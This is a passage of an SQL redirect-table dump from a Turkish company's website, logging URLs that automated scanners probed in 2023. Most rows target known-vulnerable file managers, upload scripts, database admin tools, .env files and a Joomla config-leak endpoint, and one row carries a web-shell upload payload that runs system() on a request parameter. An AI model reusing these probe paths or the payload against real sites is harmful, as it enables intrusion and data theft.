00:00:00',301),(32417,'http://3s-technologies.com.tr/en/wp-includes/style.php?sig=update&domain=51.79.124.111',NULL,'www.google.com','',1,0,'2023-05-24 18:15:22','0000-00-00 00:00:00',301),(32418,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/trident-detail/askquestion?tmpl=component',NULL,'','',1,0,'2023-05-24 19:15:27','0000-00-00 00:00:00',301),(32419,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-05-24 21:34:18','0000-00-00 00:00:00',301),(32420,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/spg-detail?tmpl=component&print=1',NULL,'','',1,0,'2023-05-25 01:57:22','0000-00-00 00:00:00',301),(32421,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/stencil-washer-eco-detail',NULL,'','',4,0,'2023-05-25 11:37:47','0000-00-00 00:00:00',301),(32422,'http://3s-technologies.com.tr/en/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt',NULL,'www.google.com','',8,0,'2023-05-25 20:20:18','0000-00-00 00:00:00',301),(32423,'https://www.3s-technologies.com.tr/tr/adminer/index.php',NULL,'','',1,0,'2023-05-26 08:05:53','0000-00-00 00:00:00',301),(32424,'https://www.3s-technologies.com.tr/tr/_adminer.php',NULL,'','',1,0,'2023-05-26 08:05:58','0000-00-00 00:00:00',301),(32425,'https://www.3s-technologies.com.tr/tr/adminer.php',NULL,'','',1,0,'2023-05-26 08:06:02','0000-00-00 00:00:00',301),(32426,'https://www.3s-technologies.com.tr/tr/adminer1.php',NULL,'','',1,0,'2023-05-26 08:06:05','0000-00-00 00:00:00',301),(32427,'https://www.3s-technologies.com.tr/tr/adminer/adminer.php',NULL,'','',1,0,'2023-05-26 08:06:08','0000-00-00 00:00:00',301),(32428,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-daft/t62.php',NULL,'www.google.com','',1,0,'2023-05-27 16:56:07','0000-00-00 00:00:00',301),(32429,'https://3s-technologies.com.tr/en/wp-content/themes/hello-element/footer.php',NULL,'www.google.com','',2,0,'2023-05-27 16:56:16','0000-00-00 00:00:00',301),(32430,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress-three/miin.php',NULL,'www.google.com','',4,0,'2023-05-27 16:56:23','0000-00-00 00:00:00',301),(32431,'https://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/index.php',NULL,'www.google.com','',2,0,'2023-05-27 16:56:32','0000-00-00 00:00:00',301),(32432,'https://3s-technologies.com.tr/en/repeater.php',NULL,'www.google.com','',4,0,'2023-05-27 16:56:40','0000-00-00 00:00:00',301),(32433,'http://3s-technologies.com.tr/en/repeater.php',NULL,'www.google.com','',11,0,'2023-05-27 16:56:59','0000-00-00 00:00:00',301),(32434,'https://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp_filemanager.php',NULL,'www.google.com','',1,0,'2023-05-27 16:57:08','0000-00-00 00:00:00',301),(32435,'https://3s-technologies.com.tr/en/rindex.php?action=add',NULL,'www.google.com','',2,0,'2023-05-27 16:57:18','0000-00-00 00:00:00',301),(32436,'http://3s-technologies.com.tr/tr/wp-content/plugins/mstore-api/assets/js/mstore-inspireui.js',NULL,'','',2,0,'2023-05-29 11:05:04','0000-00-00 00:00:00',301),(32437,'http://3s-technologies.com.tr/en/wp-content/plugins/easy-digital-downloads/readme.txt',NULL,'','',2,0,'2023-05-29 16:45:05','0000-00-00 00:00:00',301),(32438,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-email-capture/readme.txt',NULL,'','',1,0,'2023-05-29 16:45:16','0000-00-00 00:00:00',301),(32439,'http://3s-technologies.com.tr/en/wp-content/plugins/zendrop-dropshipping-and-fulfillment/readme.txt',NULL,'','',2,0,'2023-05-29 16:45:21','0000-00-00 00:00:00',301),(32440,'http://3s-technologies.com.tr/en/complete-order?selected_package=1',NULL,'','',2,0,'2023-05-29 16:45:25','0000-00-00 00:00:00',301),(32441,'http://3s-technologies.com.tr/tr/inputs.php',NULL,'','',511,0,'2023-05-30 21:23:55','0000-00-00 00:00:00',301),(32442,'http://3s-technologies.com.tr/tr/modules/mod_araticlws/inputs.php',NULL,'','',1,0,'2023-05-30 21:24:07','0000-00-00 00:00:00',301),(32443,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/inputs.php',NULL,'','',1,0,'2023-05-30 21:24:18','0000-00-00 00:00:00',301),(32444,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',1,0,'2023-05-31 09:01:24','0000-00-00 00:00:00',301),(32445,'http://3s-technologies.com.tr/en/modules/mod_ariimageslidersa/mod_ariimageslidersa.xml',NULL,'','',11,0,'2023-05-31 12:48:15','0000-00-00 00:00:00',301),(32446,'http://3s-technologies.com.tr/en/modules/mod_ariimageslidersa/_mod_ariimageslidersa.xml',NULL,'http://3s-technologies.com.tr/en/modules/mod_ariimageslidersa/mod_ariimageslidersa.xml','',11,0,'2023-05-31 12:48:15','0000-00-00 00:00:00',301),(32447,'http://3s-technologies.com.tr/en/s/',NULL,'http://3s-technologies.com.tr/en/s/','',7,0,'2023-05-31 17:51:38','0000-00-00 00:00:00',301),(32448,'http://3s-technologies.com.tr/tr/kcfinder/upload.php',NULL,'','',4,0,'2023-06-02 12:22:02','0000-00-00 00:00:00',301),(32449,'http://3s-technologies.com.tr/tr/asset/kcfinder/upload.php',NULL,'','',3,0,'2023-06-02 12:22:04','0000-00-00 00:00:00',301),(32450,'http://3s-technologies.com.tr/tr/assets/kcfinder/upload.php',NULL,'','',3,0,'2023-06-02 12:22:06','0000-00-00 00:00:00',301),(32451,'http://3s-technologies.com.tr/tr/js/kcfinder/upload.php',NULL,'','',2,0,'2023-06-02 12:22:08','0000-00-00 00:00:00',301),(32452,'http://3s-technologies.com.tr/tr/assets/js/kcfinder/upload.php',NULL,'','',4,0,'2023-06-02 12:22:10','0000-00-00 00:00:00',301),(32453,'http://3s-technologies.com.tr/tr/assets/plugins/kcfinder/upload.php',NULL,'','',3,0,'2023-06-02 12:22:12','0000-00-00 00:00:00',301),(32454,'http://3s-technologies.com.tr/tr/plugins/kcfinder/upload.php',NULL,'','',2,0,'2023-06-02 12:22:15','0000-00-00 00:00:00',301),(32455,'http://3s-technologies.com.tr/tr/ckeditor/kcfinder/upload.php',NULL,'','',2,0,'2023-06-02 12:22:16','0000-00-00 00:00:00',301),(32456,'http://3s-technologies.com.tr/tr/ckeditor/plugins/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:18','0000-00-00 00:00:00',301),(32457,'http://3s-technologies.com.tr/tr/components/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:20','0000-00-00 00:00:00',301),(32458,'http://3s-technologies.com.tr/tr/core/scripts/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:22','0000-00-00 00:00:00',301),(32459,'http://3s-technologies.com.tr/tr/core/scripts/wysiwyg/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:24','0000-00-00 00:00:00',301),(32460,'http://3s-technologies.com.tr/tr/js/tinymce/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:26','0000-00-00 00:00:00',301),(32461,'http://3s-technologies.com.tr/tr/lib/kcfinder/upload.php',NULL,'','',2,0,'2023-06-02 12:22:31','0000-00-00 00:00:00',301),(32462,'http://3s-technologies.com.tr/tr/libs/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:33','0000-00-00 00:00:00',301),(32463,'http://3s-technologies.com.tr/tr/media/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:34','0000-00-00 00:00:00',301),(32464,'http://3s-technologies.com.tr/tr/jquery/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:36','0000-00-00 00:00:00',301),(32465,'http://3s-technologies.com.tr/tr/app/webroot/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:38','0000-00-00 00:00:00',301),(32466,'http://3s-technologies.com.tr/tr/app/webroot/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:40','0000-00-00 00:00:00',301),(32467,'http://3s-technologies.com.tr/tr/application/themes/admin/assets/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:42','0000-00-00 00:00:00',301),(32468,'http://3s-technologies.com.tr/tr/admin/kcfinder/upload.php',NULL,'','',2,0,'2023-06-02 12:22:43','0000-00-00 00:00:00',301),(32469,'http://3s-technologies.com.tr/tr/admin/ckeditor/kcfinder/upload.php',NULL,'','',2,0,'2023-06-02 12:22:45','0000-00-00 00:00:00',301),(32470,'http://3s-technologies.com.tr/tr/admin/ckeditor/plugins/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:46','0000-00-00 00:00:00',301),(32471,'http://3s-technologies.com.tr/tr/admin/core/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:47','0000-00-00 00:00:00',301),(32472,'http://3s-technologies.com.tr/tr/admin/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-02 12:22:49','0000-00-00 00:00:00',301),(32473,'http://3s-technologies.com.tr/tr/filemanager/dialog.php',NULL,'','',80,0,'2023-06-02 12:22:50','0000-00-00 00:00:00',301),(32474,'http://3s-technologies.com.tr/tr/assets/filemanager/dialog.php',NULL,'','',5,0,'2023-06-02 12:22:52','0000-00-00 00:00:00',301),(32475,'http://3s-technologies.com.tr/tr/asset/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:22:55','0000-00-00 00:00:00',301),(32476,'http://3s-technologies.com.tr/tr/assets/plugins/filemanager/dialog.php',NULL,'','',5,0,'2023-06-02 12:22:56','0000-00-00 00:00:00',301),(32477,'http://3s-technologies.com.tr/tr/phpformbuilder/plugins/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:22:57','0000-00-00 00:00:00',301),(32478,'http://3s-technologies.com.tr/tr/assets/tinymce/plugins/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:22:59','0000-00-00 00:00:00',301),(32479,'http://3s-technologies.com.tr/tr/assets/plugins/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:01','0000-00-00 00:00:00',301),(32480,'http://3s-technologies.com.tr/tr/scripts/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:02','0000-00-00 00:00:00',301),(32481,'http://3s-technologies.com.tr/tr/admin/filemanager/dialog.php',NULL,'','',5,0,'2023-06-02 12:23:04','0000-00-00 00:00:00',301),(32482,'http://3s-technologies.com.tr/tr/assets/scripts/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:05','0000-00-00 00:00:00',301),(32483,'http://3s-technologies.com.tr/tr/assets/admin/tinymce/plugins/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:06','0000-00-00 00:00:00',301),(32484,'http://3s-technologies.com.tr/tr/js/tinymce4/plugins/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:08','0000-00-00 00:00:00',301),(32485,'http://3s-technologies.com.tr/tr/tinymce/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:09','0000-00-00 00:00:00',301),(32486,'http://3s-technologies.com.tr/tr/filemanager/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:11','0000-00-00 00:00:00',301),(32487,'http://3s-technologies.com.tr/tr/assets/admin/js/tinymce/plugins/filemanager/dialog.php',NULL,'','',3,0,'2023-06-02 12:23:12','0000-00-00 00:00:00',301),(32488,'http://3s-technologies.com.tr/tr/tinymce/plugins/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:14','0000-00-00 00:00:00',301),(32489,'http://3s-technologies.com.tr/tr/public/scripts/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:15','0000-00-00 00:00:00',301),(32490,'http://3s-technologies.com.tr/tr/media/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:16','0000-00-00 00:00:00',301),(32491,'http://3s-technologies.com.tr/tr/public/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:17','0000-00-00 00:00:00',301),(32492,'http://3s-technologies.com.tr/tr/public/js/libraries/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:19','0000-00-00 00:00:00',301),(32493,'http://3s-technologies.com.tr/tr/js/filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:20','0000-00-00 00:00:00',301),(32494,'http://3s-technologies.com.tr/tr/cms/tinymce/filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:21','0000-00-00 00:00:00',301),(32495,'http://3s-technologies.com.tr/tr/resources/plugins/tiny_mce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:23','0000-00-00 00:00:00',301),(32496,'http://3s-technologies.com.tr/tr/resources/js/tinymce/plugins/filemanager/dialog.php',NULL,'','',2,0,'2023-06-02 12:23:24','0000-00-00 00:00:00',301),(32497,'http://3s-technologies.com.tr/tr/lib/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:24','0000-00-00 00:00:00',301),(32498,'http://3s-technologies.com.tr/tr/editor/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:25','0000-00-00 00:00:00',301),(32499,'http://3s-technologies.com.tr/tr/admin/events/lib/external/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:27','0000-00-00 00:00:00',301),(32500,'http://3s-technologies.com.tr/tr/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:28','0000-00-00 00:00:00',301),(32501,'http://3s-technologies.com.tr/tr/assets/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:29','0000-00-00 00:00:00',301),(32502,'http://3s-technologies.com.tr/tr/plugins/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:30','0000-00-00 00:00:00',301),(32503,'http://3s-technologies.com.tr/tr/admin/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:31','0000-00-00 00:00:00',301),(32504,'http://3s-technologies.com.tr/tr/cms/vendor/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:32','0000-00-00 00:00:00',301),(32505,'http://3s-technologies.com.tr/tr/arquivos/javascript/responsive_filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:33','0000-00-00 00:00:00',301),(32506,'http://3s-technologies.com.tr/tr/po-content/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:34','0000-00-00 00:00:00',301),(32507,'http://3s-technologies.com.tr/tr/po-admin/filemanager/dialog.php',NULL,'','',1,0,'2023-06-02 12:23:35','0000-00-00 00:00:00',301),(32508,'http://3s-technologies.com.tr/tr/assets/plugins/elfinder/elfinder.html',NULL,'','',1,0,'2023-06-02 12:23:36','0000-00-00 00:00:00',301),(32509,'http://3s-technologies.com.tr/tr/assets/elfinder/elfinder.html',NULL,'','',1,0,'2023-06-02 12:23:37','0000-00-00 00:00:00',301),(32510,'http://3s-technologies.com.tr/tr/config/.env',NULL,'','',17,0,'2023-06-02 12:23:44','0000-00-00 00:00:00',301),(32511,'http://3s-technologies.com.tr/tr/admin/tools/assets/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:45','0000-00-00 00:00:00',301),(32512,'http://3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php',NULL,'','',2,0,'2023-06-02 12:23:46','0000-00-00 00:00:00',301),(32513,'http://3s-technologies.com.tr/tr/static/lib/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:47','0000-00-00 00:00:00',301),(32514,'http://3s-technologies.com.tr/tr/assets/js/frontend/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:48','0000-00-00 00:00:00',301),(32515,'http://3s-technologies.com.tr/tr/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:49','0000-00-00 00:00:00',301),(32516,'http://3s-technologies.com.tr/tr/admin/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:50','0000-00-00 00:00:00',301),(32517,'http://3s-technologies.com.tr/tr/asset_admin/assets/plugins/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:51','0000-00-00 00:00:00',301),(32518,'http://3s-technologies.com.tr/tr/assets/app-assets/data/jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:52','0000-00-00 00:00:00',301),(32519,'http://3s-technologies.com.tr/tr/admin/blueimp-jquery-file-upload/server/php',NULL,'','',1,0,'2023-06-02 12:23:54','0000-00-00 00:00:00',301),(32520,'http://mail.3s-technologies.com.tr/tr/kcfinder/upload.php',NULL,'','',2,0,'2023-06-03 07:31:14','0000-00-00 00:00:00',301),(32521,'http://mail.3s-technologies.com.tr/tr/asset/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:16','0000-00-00 00:00:00',301),(32522,'http://mail.3s-technologies.com.tr/tr/assets/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:17','0000-00-00 00:00:00',301),(32523,'http://mail.3s-technologies.com.tr/tr/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:19','0000-00-00 00:00:00',301),(32524,'http://mail.3s-technologies.com.tr/tr/assets/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:21','0000-00-00 00:00:00',301),(32525,'http://mail.3s-technologies.com.tr/tr/assets/plugins/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:24','0000-00-00 00:00:00',301),(32526,'http://mail.3s-technologies.com.tr/tr/plugins/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:26','0000-00-00 00:00:00',301),(32527,'http://mail.3s-technologies.com.tr/tr/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:28','0000-00-00 00:00:00',301),(32528,'http://mail.3s-technologies.com.tr/tr/ckeditor/plugins/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:30','0000-00-00 00:00:00',301),(32529,'http://mail.3s-technologies.com.tr/tr/components/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:33','0000-00-00 00:00:00',301),(32530,'http://mail.3s-technologies.com.tr/tr/core/scripts/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:35','0000-00-00 00:00:00',301),(32531,'http://mail.3s-technologies.com.tr/tr/core/scripts/wysiwyg/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:37','0000-00-00 00:00:00',301),(32532,'http://mail.3s-technologies.com.tr/tr/js/tinymce/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:39','0000-00-00 00:00:00',301),(32533,'http://mail.3s-technologies.com.tr/tr/lib/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:44','0000-00-00 00:00:00',301),(32534,'http://mail.3s-technologies.com.tr/tr/libs/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:46','0000-00-00 00:00:00',301),(32535,'http://mail.3s-technologies.com.tr/tr/media/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:48','0000-00-00 00:00:00',301),(32536,'http://mail.3s-technologies.com.tr/tr/jquery/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:51','0000-00-00 00:00:00',301),(32537,'http://mail.3s-technologies.com.tr/tr/app/webroot/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:53','0000-00-00 00:00:00',301),(32538,'http://mail.3s-technologies.com.tr/tr/app/webroot/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:55','0000-00-00 00:00:00',301),(32539,'http://mail.3s-technologies.com.tr/tr/application/themes/admin/assets/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:57','0000-00-00 00:00:00',301),(32540,'http://mail.3s-technologies.com.tr/tr/admin/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:31:59','0000-00-00 00:00:00',301),(32541,'http://mail.3s-technologies.com.tr/tr/admin/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:32:01','0000-00-00 00:00:00',301),(32542,'http://mail.3s-technologies.com.tr/tr/admin/ckeditor/plugins/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:32:04','0000-00-00 00:00:00',301),(32543,'http://mail.3s-technologies.com.tr/tr/admin/core/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:32:06','0000-00-00 00:00:00',301),(32544,'http://mail.3s-technologies.com.tr/tr/admin/js/kcfinder/upload.php',NULL,'','',1,0,'2023-06-03 07:32:08','0000-00-00 00:00:00',301),(32545,'http://mail.3s-technologies.com.tr/tr/filemanager/dialog.php',NULL,'','',17,0,'2023-06-03 07:32:10','0000-00-00 00:00:00',301),(32546,'http://mail.3s-technologies.com.tr/tr/assets/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:12','0000-00-00 00:00:00',301),(32547,'http://mail.3s-technologies.com.tr/tr/asset/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:13','0000-00-00 00:00:00',301),(32548,'http://mail.3s-technologies.com.tr/tr/assets/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:15','0000-00-00 00:00:00',301),(32549,'http://mail.3s-technologies.com.tr/tr/phpformbuilder/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:17','0000-00-00 00:00:00',301),(32550,'http://mail.3s-technologies.com.tr/tr/assets/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:20','0000-00-00 00:00:00',301),(32551,'http://mail.3s-technologies.com.tr/tr/assets/plugins/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:21','0000-00-00 00:00:00',301),(32552,'http://mail.3s-technologies.com.tr/tr/scripts/filemanager/dialog.php',NULL,'','',2,0,'2023-06-03 07:32:24','0000-00-00 00:00:00',301),(32553,'http://mail.3s-technologies.com.tr/tr/admin/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:25','0000-00-00 00:00:00',301),(32554,'http://mail.3s-technologies.com.tr/tr/assets/scripts/filemanager/dialog.php',NULL,'','',2,0,'2023-06-03 07:32:27','0000-00-00 00:00:00',301),(32555,'http://mail.3s-technologies.com.tr/tr/assets/admin/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:29','0000-00-00 00:00:00',301),(32556,'http://mail.3s-technologies.com.tr/tr/js/tinymce4/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:31','0000-00-00 00:00:00',301),(32557,'http://mail.3s-technologies.com.tr/tr/tinymce/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:33','0000-00-00 00:00:00',301),(32558,'http://mail.3s-technologies.com.tr/tr/filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:35','0000-00-00 00:00:00',301),(32559,'http://mail.3s-technologies.com.tr/tr/assets/admin/js/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:38','0000-00-00 00:00:00',301),(32560,'http://mail.3s-technologies.com.tr/tr/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:40','0000-00-00 00:00:00',301),(32561,'http://mail.3s-technologies.com.tr/tr/public/scripts/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:42','0000-00-00 00:00:00',301),(32562,'http://mail.3s-technologies.com.tr/tr/media/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:44','0000-00-00 00:00:00',301),(32563,'http://mail.3s-technologies.com.tr/tr/public/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:47','0000-00-00 00:00:00',301),(32564,'http://mail.3s-technologies.com.tr/tr/public/js/libraries/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:50','0000-00-00 00:00:00',301),(32565,'http://mail.3s-technologies.com.tr/tr/js/filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:52','0000-00-00 00:00:00',301),(32566,'http://mail.3s-technologies.com.tr/tr/cms/tinymce/filemanager/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:54','0000-00-00 00:00:00',301),(32567,'http://mail.3s-technologies.com.tr/tr/resources/plugins/tiny_mce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:32:57','0000-00-00 00:00:00',301),(32568,'http://mail.3s-technologies.com.tr/tr/resources/js/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:33:00','0000-00-00 00:00:00',301),(32569,'http://mail.3s-technologies.com.tr/tr/lib/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:33:02','0000-00-00 00:00:00',301),(32570,'http://mail.3s-technologies.com.tr/tr/editor/filemanager/dialog.php',NULL,'','',1,0,'2023-06-03 07:33:05','0000-00-00 00:00:00',301),(32571,'http://mail.3s-technologies.com.tr/tr/api/index.php/v1/config/application?public=true',NULL,'','',3,0,'2023-06-04 16:02:36','0000-00-00 00:00:00',301),(32572,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/tel-lehim',NULL,'','',2,0,'2023-06-04 17:28:40','0000-00-00 00:00:00',301),(32573,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',2,0,'2023-06-05 04:36:45','0000-00-00 00:00:00',301),(32574,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-daft/t62.php',NULL,'www.google.com','',1,0,'2023-06-05 07:52:46','0000-00-00 00:00:00',301),(32575,'https://www.3s-technologies.com.tr/en/wp-content/themes/hello-element/footer.php',NULL,'www.google.com','',1,0,'2023-06-05 07:52:48','0000-00-00 00:00:00',301),(32576,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wordpress-three/miin.php',NULL,'www.google.com','',1,0,'2023-06-05 07:52:49','0000-00-00 00:00:00',301),(32577,'https://www.3s-technologies.com.tr/en/wp-admin/css/colors/coffee/index.php',NULL,'www.google.com','',1,0,'2023-06-05 07:52:50','0000-00-00 00:00:00',301),(32578,'https://www.3s-technologies.com.tr/en/repeater.php',NULL,'www.google.com','',1,0,'2023-06-05 07:52:52','0000-00-00 00:00:00',301),(32579,'http://www.3s-technologies.com.tr/en/repeater.php',NULL,'www.google.com','',1,0,'2023-06-05 07:52:59','0000-00-00 00:00:00',301),(32580,'https://www.3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp_filemanager.php',NULL,'www.google.com','',1,0,'2023-06-05 07:53:08','0000-00-00 00:00:00',301),(32581,'https://www.3s-technologies.com.tr/en/rindex.php?action=add',NULL,'www.google.com','',1,0,'2023-06-05 07:53:10','0000-00-00 00:00:00',301),(32582,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,product_name/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-06-05 08:07:09','0000-00-00 00:00:00',301),(32583,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',3,0,'2023-06-09 00:45:28','0000-00-00 00:00:00',301),(32584,'http://www.3s-technologies.com.tr/tr/dist/images/mask/guide/cn/step1.jpg',NULL,'','',3,0,'2023-06-10 00:35:38','0000-00-00 00:00:00',301),(32585,'http://3s-technologies.com.tr/tr/repeater.php',NULL,'','',129,0,'2023-06-10 03:09:50','0000-00-00 00:00:00',301),(32586,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-iåÿleme-acrylic-processing/akrilik-iåÿleme-acrylic-processing',NULL,'','',2,0,'2023-06-10 07:09:18','0000-00-00 00:00:00',301),(32587,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',1,0,'2023-06-11 21:15:50','0000-00-00 00:00:00',301),(32588,'http://www.3s-technologies.com.tr/tr/adminer/index.php',NULL,'','',1,0,'2023-06-12 11:06:56','0000-00-00 00:00:00',301),(32589,'http://www.3s-technologies.com.tr/tr/_adminer.php',NULL,'','',1,0,'2023-06-12 11:07:00','0000-00-00 00:00:00',301),(32590,'http://www.3s-technologies.com.tr/tr/adminer1.php',NULL,'','',1,0,'2023-06-12 11:07:05','0000-00-00 00:00:00',301),(32591,'http://www.3s-technologies.com.tr/tr/adminer/adminer.php',NULL,'','',1,0,'2023-06-12 11:07:07','0000-00-00 00:00:00',301),(32592,'https://mail.3s-technologies.com.tr/tr/api/index.php/v1/config/application?public=true',NULL,'','',1,0,'2023-06-13 10:38:11','0000-00-00 00:00:00',301),(32593,'https://www.3s-technologies.com.tr/tr/api/index.php/v1/config/application?public=true',NULL,'','',1,0,'2023-06-13 12:51:24','0000-00-00 00:00:00',301),(32594,'http://3s-technologies.com.tr/en/wp-content/plugins/revslider/includes/external/page/index.php',NULL,'','',10,0,'2023-06-14 08:54:56','0000-00-00 00:00:00',301),(32595,'http://3s-technologies.com.tr/en/wp-22.php?sfilename=0x0.php&sfilecontent=<?=echo system($_get[\"ll\"]; );&supfiles=0x0.php',NULL,'','',1,0,'2023-06-15 23:43:12','0000-00-00 00:00:00',301),(32596,'http://3s-technologies.com.tr/en/alfa-rex.php7',NULL,'www.google.com','',12,0,'2023-06-16 07:37:56','0000-00-00 